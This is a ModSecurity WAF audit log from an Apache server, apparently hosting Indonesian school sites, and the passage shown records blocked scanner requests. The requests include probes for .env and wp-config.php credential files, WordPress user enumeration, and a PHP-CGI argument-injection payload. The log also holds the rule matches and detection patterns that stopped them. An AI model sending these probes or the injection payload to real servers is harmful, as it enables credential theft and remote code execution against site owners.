--f7170f62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749565072057962 973 (- - -) Stopwatch2: 1749565072057962 973; combined=320, p1=289, p2=0, p3=0, p4=0, p5=31, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7170f62-Z-- --63c09a5c-A-- [10/Jun/2025:21:17:52 +0700] aEg-kDQZgo88hy0TiYxc1AAAAFA 103.236.140.4 57292 103.236.140.4 8181 --63c09a5c-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 157.245.156.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.245.156.33 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --63c09a5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63c09a5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749565072333560 962 (- - -) Stopwatch2: 1749565072333560 962; combined=362, p1=316, p2=0, p3=0, p4=0, p5=46, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63c09a5c-Z-- --080dc07c-A-- [10/Jun/2025:21:41:43 +0700] aEhEJ2kffiosQXBbxVZnDQAAAMw 103.236.140.4 54848 103.236.140.4 8181 --080dc07c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.34.246 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.34.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --080dc07c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --080dc07c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749566503130328 854 (- - -) Stopwatch2: 1749566503130328 854; combined=369, p1=330, p2=0, p3=0, p4=0, p5=39, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --080dc07c-Z-- --c1115159-A-- [10/Jun/2025:21:51:34 +0700] aEhGdpSz29O8wd7wtMuGHQAAAIM 103.236.140.4 55506 103.236.140.4 8181 --c1115159-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-T580) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Safari/537.36 Accept-Charset: utf-8 --c1115159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1115159-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749567094186567 915 (- - -) Stopwatch2: 1749567094186567 915; combined=371, p1=330, p2=0, p3=0, p4=0, p5=40, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1115159-Z-- --88a25b5c-A-- [10/Jun/2025:21:52:04 +0700] aEhGlDQZgo88hy0TiYyLygAAAFg 103.236.140.4 58368 103.236.140.4 8181 --88a25b5c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; CPH1823 Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36 Accept-Charset: utf-8 --88a25b5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88a25b5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749567124594095 762 (- - -) Stopwatch2: 1749567124594095 762; combined=372, p1=337, p2=0, p3=0, p4=0, p5=34, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88a25b5c-Z-- --578e8438-A-- [10/Jun/2025:22:07:01 +0700] aEhKFWkffiosQXBbxVaLlQAAAM8 103.236.140.4 60502 103.236.140.4 8181 --578e8438-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 157.245.156.33 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 157.245.156.33 Accept-Encoding: gzip X-Varnish: 177319743 --578e8438-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --578e8438-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749568021401489 1138 (- - -) Stopwatch2: 1749568021401489 1138; combined=379, p1=341, p2=0, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --578e8438-Z-- --e070d06d-A-- [10/Jun/2025:22:07:01 +0700] aEhKFWQJEkWdvAT5oU4smQAAABY 103.236.140.4 60526 103.236.140.4 8181 --e070d06d-B-- GET /sendgrid/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 157.245.156.33 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 157.245.156.33 Accept-Encoding: gzip X-Varnish: 177319749 --e070d06d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e070d06d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749568021530895 976 (- - -) Stopwatch2: 1749568021530895 976; combined=386, p1=351, p2=0, p3=0, p4=0, p5=35, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e070d06d-Z-- --b42f5c59-A-- [10/Jun/2025:22:07:01 +0700] aEhKFZSz29O8wd7wtMubTAAAAJE 103.236.140.4 60542 103.236.140.4 8181 --b42f5c59-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 157.245.156.33 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 157.245.156.33 Accept-Encoding: gzip X-Varnish: 177007604 --b42f5c59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b42f5c59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749568021642155 897 (- - -) Stopwatch2: 1749568021642155 897; combined=384, p1=344, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b42f5c59-Z-- --116e2634-A-- [10/Jun/2025:22:20:59 +0700] aEhNW5Sz29O8wd7wtMuvbgAAAIg 103.236.140.4 59362 103.236.140.4 8181 --116e2634-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 78.187.58.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 78.187.58.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --116e2634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --116e2634-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749568859675643 3076 (- - -) Stopwatch2: 1749568859675643 3076; combined=1797, p1=584, p2=1184, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --116e2634-Z-- --c63b4019-A-- [10/Jun/2025:22:21:20 +0700] aEhNcGQJEkWdvAT5oU5DUgAAABU 103.236.140.4 33278 103.236.140.4 8181 --c63b4019-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --c63b4019-C-- --c63b4019-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c63b4019-E-- --c63b4019-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749568880441859 4015 (- - -) Stopwatch2: 1749568880441859 4015; combined=2619, p1=507, p2=2077, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c63b4019-Z-- --37ed4416-A-- [10/Jun/2025:23:04:11 +0700] aEhXe5Sz29O8wd7wtMvkNgAAAIw 103.236.140.4 51966 103.236.140.4 8181 --37ed4416-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.23.218.208 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.23.218.208 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --37ed4416-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37ed4416-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749571451818719 732 (- - -) Stopwatch2: 1749571451818719 732; combined=271, p1=238, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37ed4416-Z-- --af19c661-A-- [10/Jun/2025:23:21:06 +0700] aEhbcmQJEkWdvAT5oU6YsAAAAAE 103.236.140.4 36098 103.236.140.4 8181 --af19c661-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Accept-Charset: utf-8 --af19c661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af19c661-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749572466912943 754 (- - -) Stopwatch2: 1749572466912943 754; combined=324, p1=282, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af19c661-Z-- --99aa266b-A-- [10/Jun/2025:23:36:22 +0700] aEhfBjQZgo88hy0TiYwRVQAAAEo 103.236.140.4 42568 103.236.140.4 8181 --99aa266b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Accept-Charset: utf-8 --99aa266b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99aa266b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749573382555857 677 (- - -) Stopwatch2: 1749573382555857 677; combined=289, p1=235, p2=0, p3=0, p4=0, p5=54, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99aa266b-Z-- --ad56c811-A-- [10/Jun/2025:23:36:33 +0700] aEhfEWQJEkWdvAT5oU6oDAAAABg 103.236.140.4 43274 103.236.140.4 8181 --ad56c811-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --ad56c811-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad56c811-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749573393117014 795 (- - -) Stopwatch2: 1749573393117014 795; combined=342, p1=301, p2=0, p3=0, p4=0, p5=41, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad56c811-Z-- --24a38036-A-- [11/Jun/2025:00:03:02 +0700] aEhlRmQJEkWdvAT5oU7EswAAAAU 103.236.140.4 51534 103.236.140.4 8181 --24a38036-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.116.105.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.116.105.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --24a38036-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --24a38036-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749574982296332 3529 (- - -) Stopwatch2: 1749574982296332 3529; combined=2021, p1=707, p2=1277, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --24a38036-Z-- --1c14914b-A-- [11/Jun/2025:00:09:55 +0700] aEhm42QJEkWdvAT5oU7RFAAAAAo 103.236.140.4 45040 103.236.140.4 8181 --1c14914b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.252.238.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.252.238.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1c14914b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c14914b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749575395271385 26151 (- - -) Stopwatch2: 1749575395271385 26151; combined=2816, p1=1096, p2=1674, p3=0, p4=0, p5=46, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c14914b-Z-- --df562e00-A-- [11/Jun/2025:00:53:49 +0700] aEhxLTQZgo88hy0TiYxtIQAAAEc 103.236.140.4 51876 103.236.140.4 8181 --df562e00-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.239.136.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.239.136.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --df562e00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df562e00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749578029621063 2260 (- - -) Stopwatch2: 1749578029621063 2260; combined=1189, p1=394, p2=763, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df562e00-Z-- --da7acf28-A-- [11/Jun/2025:01:07:07 +0700] aEh0SzQZgo88hy0TiYyBTgAAAEY 103.236.140.4 58214 103.236.140.4 8181 --da7acf28-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 159.223.84.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 159.223.84.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --da7acf28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da7acf28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749578827517449 834 (- - -) Stopwatch2: 1749578827517449 834; combined=328, p1=289, p2=0, p3=0, p4=0, p5=38, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da7acf28-Z-- --326a5468-A-- [11/Jun/2025:01:07:07 +0700] aEh0SzQZgo88hy0TiYyBUAAAAEw 103.236.140.4 58220 103.236.140.4 8181 --326a5468-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 159.223.84.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 159.223.84.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 